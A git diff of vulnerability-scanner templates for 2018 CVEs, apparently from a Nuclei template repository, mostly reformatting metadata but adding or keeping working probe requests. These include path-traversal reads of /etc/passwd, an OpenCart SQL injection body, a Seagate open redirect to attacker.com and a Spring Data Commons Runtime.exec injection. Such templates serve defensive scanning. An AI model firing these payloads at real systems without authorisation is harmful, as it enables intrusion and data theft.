https://seclists.org/fulldisclosure/2018/Oct/36 + - http://sploit.tech/2018/10/12/D-Link.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-10822 cwe-id: CWE-22 + tags: cve,cve2018,lfi,router,dlink requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-10823.yaml b/cves/2018/CVE-2018-10823.yaml index 81ca5b0d08..0f611d04de 100644 --- a/cves/2018/CVE-2018-10823.yaml +++ b/cves/2018/CVE-2018-10823.yaml @@ -8,12 +8,14 @@ info: reference: - https://www.exploit-db.com/exploits/45676 - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - tags: cve,cve2018,rce,iot,dlink,router + - https://seclists.org/fulldisclosure/2018/Oct/36 + - http://sploit.tech/2018/10/12/D-Link.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-score: 8.8 cve-id: CVE-2018-10823 cwe-id: CWE-78 + tags: cve,cve2018,rce,iot,dlink,router requests: - method: GET @@ -25,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-10956.yaml b/cves/2018/CVE-2018-10956.yaml new file mode 100644 index 0000000000..dd4b86b2af --- /dev/null +++ b/cves/2018/CVE-2018-10956.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-10956 + +info: + name: IPConfigure Orchid Core VMS 2.0.5 - Unauthenticated Directory Traversal. + author: 0x_Akoko + severity: high + description: IPConfigure Orchid Core VMS 2.0.5 allows Directory Traversal. + reference: + - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/ + - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb + - https://www.cvedetails.com/cve/CVE-2018-10956 + - https://www.exploit-db.com/exploits/44916/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-10956 + cwe-id: CWE-22 + metadata: + shodan-query: http.title:"Orchid Core VMS" + tags: cve,cve2018,orchid,vms,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-11231.yaml b/cves/2018/CVE-2018-11231.yaml new file mode 100644 index 0000000000..b6ea184ff6 --- /dev/null +++ b/cves/2018/CVE-2018-11231.yaml @@ -0,0 +1,37 @@ +id: CVE-2018-11231 + +info: + name: Opencart Divido plugin - Sql Injection + author: ritikchaddha + severity: high + reference: + - http://foreversong.cn/archives/1183 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11231 + tags: opencart,sqli,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-11231 + cwe-id: CWE-89 + description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information." + +requests: + - raw: + - | + POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1 + Host: {{Hostname}} + + {"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2} + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "6f7c6dcbc380aac3bcba1f9fccec991e" + + - type: status + status: + - 200 diff --git a/cves/2018/CVE-2018-11409.yaml b/cves/2018/CVE-2018-11409.yaml index 888187304c..ddaaba03ea 100644 --- a/cves/2018/CVE-2018-11409.yaml +++ b/cves/2018/CVE-2018-11409.yaml @@ -4,14 +4,18 @@ info: name: Splunk Sensitive Information Disclosure author: harshbothra_ severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 - tags: cve,cve2018,splunk + description: Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + - https://github.com/kofa2002/splunk + - https://www.exploit-db.com/exploits/44865/ + - http://www.securitytracker.com/id/1041148 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-11409 cwe-id: CWE-200 - description: "Splunk through 7.0.1 allows information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key." + tags: cve,cve2018,splunk requests: - method: GET diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index a5c31e20e5..fc3353a738 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -1,17 +1,20 @@ id: CVE-2018-11709 info: - name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) + name: WordPress wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting author: daffainfo severity: medium - description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 - tags: cve,cve2018,wordpress,xss,wp-plugin + description: WordPress wpForo Forum plugin before 1.4.12 for WordPress allows unauthenticated reflected cross-site scripting via the URI. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-11709 + - https://wordpress.org/plugins/wpforo/#developers + - https://wpvulndb.com/vulnerabilities/9090 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-11709 cwe-id: CWE-79 + tags: cve,cve2018,wordpress,xss,wp-plugin requests: - method: GET @@ -33,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/31 diff --git a/cves/2018/CVE-2018-11759.yaml b/cves/2018/CVE-2018-11759.yaml index 124b5bd839..d031ff11eb 100644 --- a/cves/2018/CVE-2018-11759.yaml +++ b/cves/2018/CVE-2018-11759.yaml @@ -4,14 +4,18 @@ info: name: Apache Tomcat JK Status Manager Access author: harshbothra_ severity: high - reference: https://github.com/immunIT/CVE-2018-11759 - tags: cve,cve2018,apache + description: The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + reference: + - https://github.com/immunIT/CVE-2018-11759 + - https://lists.apache.org/thread.html/6d564bb0ab73d6b3efdd1d6b1c075d1a2c84ecd84a4159d6122529ad@%3Cannounce.tomcat.apache.org%3E + - http://www.securityfocus.com/bid/105888 + - https://lists.debian.org/debian-lts-announce/2018/12/msg00007.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-11759 cwe-id: CWE-22 - description: "The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical." + tags: cve,cve2018,apache,tomcat,status requests: - method: GET @@ -24,6 +28,7 @@ requests: - type: status status: - 200 + - type: word words: - "JK Status Manager" diff --git a/cves/2018/CVE-2018-11776.yaml b/cves/2018/CVE-2018-11776.yaml index 98bff06e5c..b2e30d97ec 100644 --- a/cves/2018/CVE-2018-11776.yaml +++ b/cves/2018/CVE-2018-11776.yaml @@ -4,14 +4,18 @@ info: name: Apache Struts2 S2-057 RCE author: pikpikcu severity: high - reference: https://github.com/jas502n/St2-057 - tags: cve,cve2018,apache,rce,struts + description: 'Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn''t have value and action set and in same time, its upper package have no or wildcard namespace.' + reference: + - https://github.com/jas502n/St2-057 + - https://cwiki.apache.org/confluence/display/WW/S2-057 + - https://security.netapp.com/advisory/ntap-20180822-0001/ + - http://www.securitytracker.com/id/1041547 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-11776 cwe-id: CWE-20 - description: "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace." + tags: cve,cve2018,apache,rce,struts requests: - method: GET @@ -23,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: diff --git a/cves/2018/CVE-2018-11784.yaml b/cves/2018/CVE-2018-11784.yaml index ec8276c693..371917e082 100644 --- a/cves/2018/CVE-2018-11784.yaml +++ b/cves/2018/CVE-2018-11784.yaml @@ -1,17 +1,20 @@ id: CVE-2018-11784 info: - name: Apache Tomcat Open Redirect + name: Apache Tomcat - Open Redirect author: geeknik - description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. - reference: https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E severity: medium - tags: tomcat,redirect,cve,cve2018 + description: Apache Tomcat versions prior to 9.0.12, 8.5.34, and 7.0.91 are prone to an open-redirection vulnerability because it fails to properly sanitize user-supplied input. + reference: + - https://lists.apache.org/thread.html/23134c9b5a23892a205dc140cdd8c9c0add233600f76b313dda6bd75@%3Cannounce.tomcat.apache.org%3E + - https://nvd.nist.gov/vuln/detail/CVE-2018-11784 + - http://www.securityfocus.com/bid/105524 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N - cvss-score: 4.30 + cvss-score: 4.3 cve-id: CVE-2018-11784 cwe-id: CWE-601 + tags: tomcat,redirect,cve,cve2018,apache requests: - method: GET @@ -23,3 +26,5 @@ requests: regex: - "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index f5ecf6d832..4e98b1fb1d 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -4,17 +4,17 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: critical - description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. + description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. reference: - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-12031 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -26,10 +26,12 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12054.yaml b/cves/2018/CVE-2018-12054.yaml index 7daf35a964..99e0202257 100644 --- a/cves/2018/CVE-2018-12054.yaml +++ b/cves/2018/CVE-2018-12054.yaml @@ -4,16 +4,18 @@ info: name: Schools Alert Management Script - Arbitrary File Read author: wisnupramoedya severity: high - description: Arbitrary File Read exists in PHP Scripts Mall Schools Alert Management Script via the f parameter in img.php, aka absolute path traversal. + description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. reference: - https://www.exploit-db.com/exploits/44874 - - https://www.cvedetails.com/cve/CVE-2018-12054 - tags: cve,cve2018,lfi + - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 + - https://github.com/unh3x/just4cve/issues/4 + - https://www.exploit-db.com/exploits/44874/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.50 + cvss-score: 7.5 cve-id: CVE-2018-12054 cwe-id: CWE-22 + tags: cve,cve2018,lfi requests: - method: GET @@ -25,8 +27,10 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/cves/2018/CVE-2018-1207.yaml b/cves/2018/CVE-2018-1207.yaml index 2d01313840..8a89ac6be8 100644 --- a/cves/2018/CVE-2018-1207.yaml +++ b/cves/2018/CVE-2018-1207.yaml @@ -1,24 +1,24 @@ id: CVE-2018-1207 info: - name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE + name: Dell iDRAC7/8 Devices - Remote Code Injection author: dwisiswant0 severity: critical - reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf description: | - This template supports the detection part only. - - Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability + Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain a CGI injection vulnerability which could be used to execute remote code. A remote unauthenticated attacker may potentially be able to use CGI variables to execute remote code. - - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py - tags: cve,cve2018,dell,injection,rce + reference: + - https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf + - https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py + - https://nvd.nist.gov/vuln/detail/CVE-2018-1207 + - http://en.community.dell.com/techcenter/extras/m/white_papers/20485410 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1207 cwe-id: CWE-94 + tags: cve,cve2018,dell,injection,rce requests: - method: GET @@ -28,4 +28,6 @@ requests: - type: word words: - "calling init: /lib/" - part: all + part: response + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12095.yaml b/cves/2018/CVE-2018-12095.yaml index 202b897b33..cd09108f78 100644 --- a/cves/2018/CVE-2018-12095.yaml +++ b/cves/2018/CVE-2018-12095.yaml @@ -9,12 +9,12 @@ info: - https://www.exploit-db.com/exploits/44895 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 - https://cxsecurity.com/issue/WLB-2018060092 - tags: cve,cve2018,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2018-12095 cwe-id: CWE-79 + tags: cve,cve2018,xss requests: - method: GET diff --git a/cves/2018/CVE-2018-12296.yaml b/cves/2018/CVE-2018-12296.yaml new file mode 100644 index 0000000000..02f94c31e4 --- /dev/null +++ b/cves/2018/CVE-2018-12296.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-12296 + +info: + name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure + author: princechaddha + severity: high + description: Insufficient access control in /api/external/7.0/system.System.get_infos in Seagate NAS OS version 4.3.15.1 allows attackers to obtain information about the NAS without authentication via empty POST requests. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12296 + cwe-id: CWE-732 + tags: cve,cve2018,seagate,nasos,disclosure,unauth + +requests: + - raw: + - | + POST /api/external/7.0/system.System.get_infos HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + + matchers: + - type: word + part: body + words: + - '"version":' + - '"serial_number":' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: + - '"version": "([0-9.]+)"' diff --git a/cves/2018/CVE-2018-12300.yaml b/cves/2018/CVE-2018-12300.yaml new file mode 100644 index 0000000000..c1d638cc99 --- /dev/null +++ b/cves/2018/CVE-2018-12300.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-12300 + +info: + name: Seagate NAS OS 4.3.15.1 - Open Redirect + author: 0x_Akoko + severity: medium + description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. + reference: + - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 + - https://www.cvedetails.com/cve/CVE-2018-12300 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12300 + cwe-id: CWE-601 + tags: cve,cve2018,redirect,seagate,nasos + +requests: + - method: GET + + path: + - '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#' + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/cves/2018/CVE-2018-12613.yaml b/cves/2018/CVE-2018-12613.yaml index 40bfe42ba7..9b58a055d2 100644 --- a/cves/2018/CVE-2018-12613.yaml +++ b/cves/2018/CVE-2018-12613.yaml @@ -4,14 +4,18 @@ info: name: PhpMyAdmin 4.8.1 Remote File Inclusion author: pikpikcu severity: high - reference: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - tags: cve,cve2018,phpmyadmin,lfi + description: An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). + reference: + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 + - https://www.phpmyadmin.net/security/PMASA-2018-4/ + - https://www.exploit-db.com/exploits/44928/ + - http://www.securityfocus.com/bid/104532 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.80 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2018-12613 cwe-id: CWE-287 - description: "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication)." + tags: cve,cve2018,phpmyadmin,lfi requests: - method: GET @@ -23,7 +27,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/cves/2018/CVE-2018-12634.yaml b/cves/2018/CVE-2018-12634.yaml index ed8c7f4131..55841846f4 100644 --- a/cves/2018/CVE-2018-12634.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,17 +1,21 @@ id: CVE-2018-12634 info: - name: Exposed CirCarLife System Log + name: CirCarLife Scada <4.3 - System Log Exposure author: geeknik - description: CirCarLife is an internet-connected electric vehicle charging station - reference: https://circontrol.com/ severity: critical - tags: cve,cve2018,scada,circontrol,circarlife,logs + description: CirCarLife Scada before 4.3 allows remote attackers to obtain sensitive information via a direct request for the html/log or services/system/info.html URI. CirCarLife is an internet-connected electric vehicle charging station. + reference: + - https://circontrol.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12634 + - https://www.seebug.org/vuldb/ssvid-97353 + - https://www.exploit-db.com/exploits/45384/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-12634 cwe-id: CWE-200 + tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET @@ -32,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-1271.yaml b/cves/2018/CVE-2018-1271.yaml index 52a285b05a..ebc43c3998 100644 --- a/cves/2018/CVE-2018-1271.yaml +++ b/cves/2018/CVE-2018-1271.yaml @@ -4,14 +4,18 @@ info: name: Spring MVC Directory Traversal Vulnerability author: hetroublemakr severity: medium - reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d - tags: cve,cve2018,spring,lfi + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.90 + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 cve-id: CVE-2018-1271 cwe-id: CWE-22 - description: "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack." + tags: cve,cve2018,spring,lfi,traversal requests: - method: GET diff --git a/cves/2018/CVE-2018-1273.yaml b/cves/2018/CVE-2018-1273.yaml index 819b07b7a6..50db2cdc93 100644 --- a/cves/2018/CVE-2018-1273.yaml +++ b/cves/2018/CVE-2018-1273.yaml @@ -1,7 +1,7 @@ id: CVE-2018-1273 info: - name: Spring Data Commons Unauthenticated RCE + name: Spring Data Commons - Remote Code Execution author: dwisiswant0 severity: critical description: | @@ -10,14 +10,17 @@ info: caused by improper neutralization of special elements. An unauthenticated remote malicious user (or attacker) can supply specially crafted request parameters against Spring Data REST backed HTTP resources - or using Spring Data’s projection-based request payload binding hat can lead to a remote code execution attack. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - tags: cve,cve2018,vmware,rce + or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 + - https://pivotal.io/security/cve-2018-1273 + - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-1273 cwe-id: CWE-20 + tags: cve,cve2018,vmware,rce,spring requests: - raw: @@ -27,7 +30,7 @@ requests: Connection: close Content-Type: application/x-www-form-urlencoded - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('§command§')}}')]=nuclei + name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei payloads: command: @@ -41,3 +44,5 @@ requests: - "\\[(font|extension|file)s\\]" condition: or part: body + +# Enhanced by mp on 2022/05/12 diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index cd23caa054..59dc289d29 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -9,12 +9,12 @@ info: - https://github.com/unh3x/just4cve/issues/10 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - tags: cve,cve2018,zoho,xss classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2018-12998 cwe-id: CWE-79 + tags: cve,cve2018,zoho,xss,manageengine requests: - method: GET diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 87f73ec29a..1805b0a5ec 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -4,15 +4,17 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: high + description: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - tags: cve,cve2018,apache,tika,rce + - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E + - http://www.securityfocus.com/bid/104001 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.10 + cvss-score: 8.1 cve-id: CVE-2018-1335 - description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." + tags: cve,cve2018,apache,tika,rce requests: - method: PUT diff --git a/cves/2018/CVE-2018-13379.yaml b/cves/2018/CVE-2018-13379.yaml index 93cc9387a3..3ad6d6e608 100644 --- a/cves/2018/CVE-2018-13379.yaml +++ b/cves/2018/CVE-2018-13379.yaml @@ -1,19 +1,20 @@ id: CVE-2018-13379 info: - name: FortiOS - Credentials Disclosure + name: Fortinet FortiOS - Credentials Disclosure author: organiccrap severity: critical - tags: cve,cve2018,fortios - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-13379 - cwe-id: CWE-22 - description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests." + description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). reference: - https://fortiguard.com/advisory/FG-IR-18-384 - https://www.fortiguard.com/psirt/FG-IR-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + 